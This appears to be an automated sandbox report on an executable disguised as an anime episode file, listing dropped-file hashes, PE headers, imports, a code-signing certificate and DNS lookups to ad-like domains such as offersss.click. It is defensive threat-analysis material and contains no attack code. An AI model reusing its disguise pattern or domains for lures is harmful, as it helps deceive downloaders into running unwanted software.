                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.1030546129930227
                                                                        Encrypted:false
                                                                        SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKOTrJddKceM9TEkQnBeAbGEYlIVky6l80t/:50i8n0itFzDHFTVdMceFBJGBp801
                                                                        MD5:A3DA1055B51418EA6B29726BC5666248
                                                                        SHA1:B423A2BE6E0327322F78DF864C66F753A7586161
                                                                        SHA-256:8BB9265C7940ED7D0F58E9C1055E47B8E185DA22505943C6BEAC8E1726A8F4DF
                                                                        SHA-512:6F02058DC22537A219A7B65DD4182F262D2DF32561EED60EAE5EF0EC0D5320275A32D32E8BE6201FD2FC502BB903E0E1449C5C214BFB243C9B7DF56F9D7252A6
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5584159664956596
                                                                        Encrypted:false
                                                                        SSDEEP:48:f8PhruRc06WXinFT5XYxdpI6jeBS2nQRSc8k0SItZQ:ehr1pFT2Co+0REfhZ
                                                                        MD5:97A0A76E097AA4380AC58513CF1E33C3
                                                                        SHA1:EEE2F98AF2AD83976B7E99BBCE61BB1FD02BC08B
                                                                        SHA-256:55B21841BD643EADF86864A3CB6EDE1E3FAF2CABB11812B316704B4D3D4F926F
                                                                        SHA-512:B0E5C6A5F7951533201442C7A3098AB857724E73EB9DA8352E5DD0218984FE4F8E31525B1FD67642AB83D5299E47FAEC2B59248845B9C6ACB08CD71DC8964D4E
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):0.13965811588951654
                                                                        Encrypted:false
                                                                        SSDEEP:24:SqZ6BzMYsjipVvipVITbZ+S0W1VW8zgNlGpIt8+kjdMClJ5IMClmVj3m+a:xZQMdS9S2nQRSc8kP8ldpI69a
                                                                        MD5:FEB60E66969B141CE95C205B9EECAADA
                                                                        SHA1:0E4396EB204CEE7CF5FBAB8888BCDEE080E9BE26
                                                                        SHA-256:D41B06921CFDCEBF5ED2E676886D497D3C061697F75E3C200277129D6855906B
                                                                        SHA-512:6F8FF232E6A85338BA3A8FCAA1F734948E046E152215A0B634E31E4EA6DB8BFA628887CAA35A30DF772F7913CCCCEE9136F6DEC3632308DEAB81A38A20801738
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.9942855302043085
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • InstallShield setup (43055/19) 0.42%
                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        File name:Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        File size:25461096
                                                                        MD5:71eabe2172181c2e4517c30c22cb6d12
                                                                        SHA1:caaa052ae05d6032d8361e61fa22a686c6b5a392
                                                                        SHA256:147e1b5a750fbfd8863449d523e3d6d110defceb74ad9cdb7c939ab75ffa2180
                                                                        SHA512:57c46b8acbec964265095314cd3dd235840318aea5afa9c06ecb937bd677b242d8e6c3ecb9d186e9014d57e6b99a8e032f25c64289058f91982311c81ca5a1f3
                                                                        SSDEEP:393216:gmnJPDpxSBQjE7v4/Gx3OajsPk/SRSu8LrB2KNIWHzQUfUKls0p8lzOHtS:3IBQjUSq3OLk/VjLt2m1Bs0pXS
                                                                        TLSH:F847333BB2646A3EC8AB473645B3935015377B25781A8C2F6BF0450DDF6A4B01E3F64A
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                        Icon Hash:a2a0b496b2caca72
                                                                        Entrypoint:0x4b5eec
                                                                        Entrypoint Section:.itext
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x5F5DDFC3 [Sun Sep 13 09:00:51 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:1
                                                                        File Version Major:6
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:5a594319a0d69dbc452e748bcf05892e
                                                                        Signature Valid:true
                                                                        Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                        Signature Validation Error:The operation completed successfully
                                                                        Error Number:0
                                                                        Not Before:10/12/2022 9:50:16 AM
                                                                        Not After:10/12/2023 9:48:39 AM
                                                                        Subject Chain:OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=LIMESTONE DIGITAL LIMITED, SERIALNUMBER=14347919, O=LIMESTONE DIGITAL LIMITED, L=Stoke-On-Trent, C=GB
                                                                        Version:3
                                                                        Thumbprint MD5:1902CF8D0B158DA71E552DBF8A895FE1
                                                                        Thumbprint SHA-1:2AAE66915908A703D5059DA2FCF4D5245B78BB30
                                                                        Thumbprint SHA-256:D64F03F1738A5FB5B1C02AE09BDFE0D95101530EB356CBFB323AFD7C0793502A
                                                                        Serial:4D2DC3C461FF097059BC7440DAC6207B
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFA4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-3Ch], eax
                                                                        mov dword ptr [ebp-40h], eax
                                                                        mov dword ptr [ebp-5Ch], eax
                                                                        mov dword ptr [ebp-30h], eax
                                                                        mov dword ptr [ebp-38h], eax
                                                                        mov dword ptr [ebp-34h], eax
                                                                        mov dword ptr [ebp-2Ch], eax
                                                                        mov dword ptr [ebp-28h], eax
                                                                        mov dword ptr [ebp-14h], eax
                                                                        mov eax, 004B10F0h
                                                                        call 00007FEEA49E10D5h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 004B65E2h
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 004B659Eh
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [004BE634h]
                                                                        call 00007FEEA4A837FFh
                                                                        call 00007FEEA4A83352h
                                                                        lea edx, dword ptr [ebp-14h]
                                                                        xor eax, eax
                                                                        call 00007FEEA49F6B48h
                                                                        mov edx, dword ptr [ebp-14h]
                                                                        mov eax, 004C1D84h
                                                                        call 00007FEEA49DBCC7h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [004C1D84h]
                                                                        mov dl, 01h
                                                                        mov eax, dword ptr [004237A4h]
                                                                        call 00007FEEA49F7BAFh
                                                                        mov dword ptr [004C1D88h], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 004B654Ah
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FEEA4A83887h
                                                                        mov dword ptr [004C1D90h], eax
                                                                        mov eax, dword ptr [004C1D90h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FEEA4A89E6Ah
                                                                        mov eax, dword ptr [004C1D90h]
                                                                        mov edx, 00000028h
                                                                        call 00007FEEA49F84A4h
                                                                        mov edx, dword ptr [004C1D90h]
                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0xc4000 | 0x9a | .edata
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2000 | 0xf36 | .idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x4800 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x18456f0 | 0x2a78 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xc6000 | 0x18 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0xc22e4 | 0x244 | .idata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xc3000 | 0x1a4 | .didata
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        .text | 0x1000 | 0xb361c | 0xb3800 | False | 0.3448639341051532 | data | 6.356058204328091 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .itext | 0xb5000 | 0x1688 | 0x1800 | False | 0.544921875 | data | 5.972750055221053 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .data | 0xb7000 | 0x37a4 | 0x3800 | False | 0.36097935267857145 | data | 5.044400562007734 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .bss | 0xbb000 | 0x6de8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata | 0xc2000 | 0xf36 | 0x1000 | False | 0.3681640625 | data | 4.8987046479600425 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .didata | 0xc3000 | 0x1a4 | 0x200 | False | 0.345703125 | data | 2.7563628682496506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .edata | 0xc4000 | 0x9a | 0x200 | False | 0.2578125 | data | 1.8722228665884297 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .tls | 0xc5000 | 0x18 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata | 0xc6000 | 0x5d | 0x200 | False | 0.189453125 | data | 1.3838943752217987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0xc7000 | 0x4800 | 0x4800 | False | 0.3149956597222222 | data | 4.420313109581478 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        Name | RVA | Size | Type | Language | Country
                                                                        RT_ICON | 0xc74c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands
                                                                        RT_ICON | 0xc75f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands
                                                                        RT_ICON | 0xc7b58 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands
                                                                        RT_ICON | 0xc7e40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands
                                                                        RT_STRING | 0xc86e8 | 0x360 | data | |
                                                                        RT_STRING | 0xc8a48 | 0x260 | data | |
                                                                        RT_STRING | 0xc8ca8 | 0x45c | data | |
                                                                        RT_STRING | 0xc9104 | 0x40c | data | |
                                                                        RT_STRING | 0xc9510 | 0x2d4 | data | |
                                                                        RT_STRING | 0xc97e4 | 0xb8 | data | |
                                                                        RT_STRING | 0xc989c | 0x9c | data | |
                                                                        RT_STRING | 0xc9938 | 0x374 | data | |
                                                                        RT_STRING | 0xc9cac | 0x398 | data | |
                                                                        RT_STRING | 0xca044 | 0x368 | data | |
                                                                        RT_STRING | 0xca3ac | 0x2a4 | data | |
                                                                        RT_RCDATA | 0xca650 | 0x10 | data | |
                                                                        RT_RCDATA | 0xca660 | 0x2c4 | data | |
                                                                        RT_RCDATA | 0xca924 | 0x2c | data | |
                                                                        RT_GROUP_ICON | 0xca950 | 0x3e | data | English | United States
                                                                        RT_VERSION | 0xca990 | 0x584 | data | English | United States
                                                                        RT_MANIFEST | 0xcaf14 | 0x726 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
                                                                        DLL | Import
                                                                        kernel32.dll | GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                        comctl32.dll | InitCommonControls
                                                                        version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                        user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                        oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                        netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
                                                                        advapi32.dll | RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                                                                        Name | Ordinal | Address
                                                                        TMethodImplementationIntercept | 3 | 0x454060
                                                                        __dbk_fcall_wrapper | 2 | 0x40d0a0
                                                                        dbkFCallWrapperAddr | 1 | 0x4be63c
                                                                        Language of compilation system | Country where language is spoken
                                                                        Dutch | Netherlands
                                                                        English | United States
                                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                        Jan 2, 2023 15:35:51.447508097 CET | 192.168.2.6 | 8.8.8.8 | 0x76e9 | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.447860003 CET | 192.168.2.6 | 8.8.8.8 | 0x356e | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.448110104 CET | 192.168.2.6 | 8.8.8.8 | 0xf14b | Standard query (0) | smashbrowser.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.910753965 CET | 192.168.2.6 | 8.8.8.8 | 0x9379 | Standard query (0) | chrome.google.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.977530003 CET | 192.168.2.6 | 8.8.8.8 | 0xfdc2 | Standard query (0) | exturl.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.253860950 CET | 192.168.2.6 | 8.8.8.8 | 0x8e6b | Standard query (0) | offersss.click | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.254240036 CET | 192.168.2.6 | 8.8.8.8 | 0xd0c | Standard query (0) | offerszzzz.click | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.254362106 CET | 192.168.2.6 | 8.8.8.8 | 0xb6c0 | Standard query (0) | s10.histats.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.656277895 CET | 192.168.2.6 | 8.8.8.8 | 0xe7c0 | Standard query (0) | s4.histats.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:54.438354969 CET | 192.168.2.6 | 8.8.8.8 | 0xc58d | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:55.108158112 CET | 192.168.2.6 | 8.8.8.8 | 0x66e1 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:55.151082039 CET | 192.168.2.6 | 8.8.8.8 | 0x41f4 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                        Jan 2, 2023 15:35:51.467344046 CET | 8.8.8.8 | 192.168.2.6 | 0x76e9 | No error (0) | accounts.google.com | | 172.217.168.45 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.470752954 CET | 8.8.8.8 | 192.168.2.6 | 0xf14b | No error (0) | smashbrowser.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.470752954 CET | 8.8.8.8 | 192.168.2.6 | 0xf14b | No error (0) | smashbrowser.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.473227978 CET | 8.8.8.8 | 192.168.2.6 | 0x356e | No error (0) | clients2.google.com | clients.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.473227978 CET | 8.8.8.8 | 192.168.2.6 | 0x356e | No error (0) | clients.l.google.com | | 142.250.203.110 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.951704979 CET | 8.8.8.8 | 192.168.2.6 | 0x9379 | No error (0) | chrome.google.com | www3.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.951704979 CET | 8.8.8.8 | 192.168.2.6 | 0x9379 | No error (0) | www3.l.google.com | | 142.250.203.110 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:51.999813080 CET | 8.8.8.8 | 192.168.2.6 | 0xfdc2 | No error (0) | exturl.com | | 38.128.66.115 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.273595095 CET | 8.8.8.8 | 192.168.2.6 | 0xb6c0 | No error (0) | s10.histats.com | s10.histats.com.web.cdn.anycast.me | | CNAME (Canonical name) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.273595095 CET | 8.8.8.8 | 192.168.2.6 | 0xb6c0 | No error (0) | s10.histats.com.web.cdn.anycast.me | 46-105-201-240.any.cdn.anycast.me | | CNAME (Canonical name) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.273595095 CET | 8.8.8.8 | 192.168.2.6 | 0xb6c0 | No error (0) | 46-105-201-240.any.cdn.anycast.me | | 46.105.201.240 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.275439024 CET | 8.8.8.8 | 192.168.2.6 | 0x8e6b | No error (0) | offersss.click | | 38.128.66.115 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.277432919 CET | 8.8.8.8 | 192.168.2.6 | 0xd0c | No error (0) | offerszzzz.click | | 38.128.66.115 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.132 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.130 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 54.39.156.32 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 54.39.128.117 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.129 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 54.39.128.162 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.127 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.131 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.128 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.27 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:53.673979044 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c0 | No error (0) | s4.histats.com | | 149.56.240.31 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:54.456315041 CET | 8.8.8.8 | 192.168.2.6 | 0xc58d | No error (0) | a.nel.cloudflare.com | | 35.190.80.1 | A (IP address) | IN (0x0001) | false
